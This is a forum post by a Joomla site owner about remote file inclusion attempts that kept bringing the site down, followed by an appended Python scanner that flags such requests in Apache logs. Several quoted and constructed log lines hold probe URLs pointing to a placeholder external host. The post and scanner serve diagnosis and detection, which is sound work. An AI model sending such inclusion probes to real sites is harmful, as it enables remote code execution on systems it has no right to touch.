I know this post is a bit long but please take time to read it. I solved my problem but others might find this useful. There still are some questions to be answered though. I have been looking around a bit and I found some posts that describe this kind of hack attempt but I believe they have not been discussed enough to give a proper solution. Maybe we can provide one in this thread.
First some of the facts, since I just know you are going to ask for them:

PHP 5.2.5, Joomla version 1.0.13, register globals off, safe mode on, Allow_url_fopen is turned on and open_basedir is set to none. I only use components that are found to be OK in the Vulnerability Checklist (the site got hacked with or without these components, so they were of no importance to the problem I had).
Now for what happened:
My site had been going down a lot last month so I started contacting my hosting company (yeah, I'm on a Shared Server so sue me). After they assured me there were no server issues I was told a "locked" or "sleeping" php process caused the downtime.
First I installed the latest joomla update (1.0.12 to 1.0.13), later I even installed my entire site from scratch on a “fresh” 1.0.13 joomla, they all went down in no time.
Note: when I say down I mean that the site won't load. Phpmyadmin, my customer server configuration or a standard .html file are accessible, but the php stuff does not work.
So I started reading this and other fora to find the solution and it did not take me long to find the wonderful FAQs section with the Joomla! Administrator's Security Checklist. I tried to apply all recommendations to a brand new joomla 1.0.13 installation (no components!) and put the site back online with the standard .htaccess file enabled. Unfortunately, the site still went down.
When investigating deeper in my log files I found that I was indeed suffering from hack attempts. PHP scripts hosted on other domains were being called from my site.
Example:
IP-DATE-TIME "GET /index.php?option=http://EXTERNAL_URL/file.txt? HTTP/1.1" 200 33035 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
Some hack attempts were HTTP coded 403 (thanks to the .htaccess file) but some still were code 200. Every time after these code 200 hack attempts, the site went down (php hanging or sleeping?).
I solved this by adding more security to my .htaccess file using the RewriteCond’s and since then the site has been online all the time. If I look at my logs now, all attempts are blocked indeed.
Now I very much would like to know:
- Is this a server config problem (as in: my host's problem)?
- Is this a Joomla core problem?
I have other sites running on the same server but on other software such as Coppermine, OSCommerce and they are not affected by similar hack attempts.
For documentation of this problem I have some nice extracts from my log files with a lot of variations on how to call the external scripts and some of the actual scripts that were called upon (I put these in a pdf for security reasons). I would love to have a php-expert to take a look at these scripts and tell me what they actually do since php is not my cup of tea.
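The requests quoted above are remote file inclusion (RFI) probes: a query parameter whose value is itself an absolute URL. As an added example (not code from the post or from Joomla), here is a small log scanner that flags such requests in Apache combined-format logs and separates the ones that were served (200) from the ones .htaccess blocked (403). The log lines are constructed for this example; the IPs and EXTERNAL_URL are placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" LogFormat (assumed; adjust if your host uses another format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A parameter value that is an absolute URL is the RFI signature: the script is
# being asked to include code from another host.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(lines):
    """Return one finding per request that passes a remote URL as a parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes values, so 'http%3A%2F%2F...' is caught too.
        for param, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_VALUE_RE.match(value):
                findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                                 "param": param, "value": value})
    return findings


def unblocked(findings):
    """Findings that were actually served (2xx): the ones the rewrite rules missed."""
    return [f for f in findings if 200 <= f["status"] < 300]


# Constructed sample, modelled on the line quoted in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Nov/2007:03:12:45 +0100] "GET /index.php?option=http://EXTERNAL_URL/file.txt? HTTP/1.1" 200 33035 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"',
    '192.0.2.11 - - [10/Nov/2007:03:13:02 +0100] "GET /index.php?option=http%3A%2F%2FEXTERNAL_URL%2Fid.txt%3F HTTP/1.1" 403 221 "-" "libwww-perl/5.805"',
    '192.0.2.12 - - [10/Nov/2007:03:14:30 +0100] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 18022 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f)
```

Anything reported by `unblocked()` is a request that reached PHP with a remote URL in a parameter, which is exactly the case worth tightening the RewriteCond rules for.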